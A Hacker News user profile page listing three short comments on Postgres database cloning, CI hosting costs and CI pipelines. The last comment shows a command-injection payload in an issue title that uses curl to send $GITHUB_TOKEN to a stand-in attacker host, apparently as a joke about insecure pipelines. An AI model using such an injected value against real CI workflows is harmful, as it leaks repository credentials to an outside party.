Live data from Hacker News

Viewing profile — eugercek

eugercek

HN member
Joined
Thu, Aug 10, 2023, 2:02 PM UTC
HN karma
23
Public activity
3 items

About eugercek

No profile information was provided.

Recent public activity

  1. comment
    Comment #48125419

    If you use xfs (+`file_copy_method=CLONE`) you can do this with Postgres 18. `CREATE DATABASE clankerdb TEMPLATE sourcedb STRATEGY=FILE_COPY;`. But Ardent can be useful for many, b…

  2. comment
    Comment #46294130

    Companies like Ubicloud gives hosted actions faster and far more cheaper (5-10x) than Microsoft itself. Now Microsoft will charge "data plane usage" (CRUDing a row that contains (i…

  3. comment
    Comment #38092288

    `new issue title" && curl hacker.boi -d $GITHUB_TOKEN && sleep 30` I hate pipelines even more :(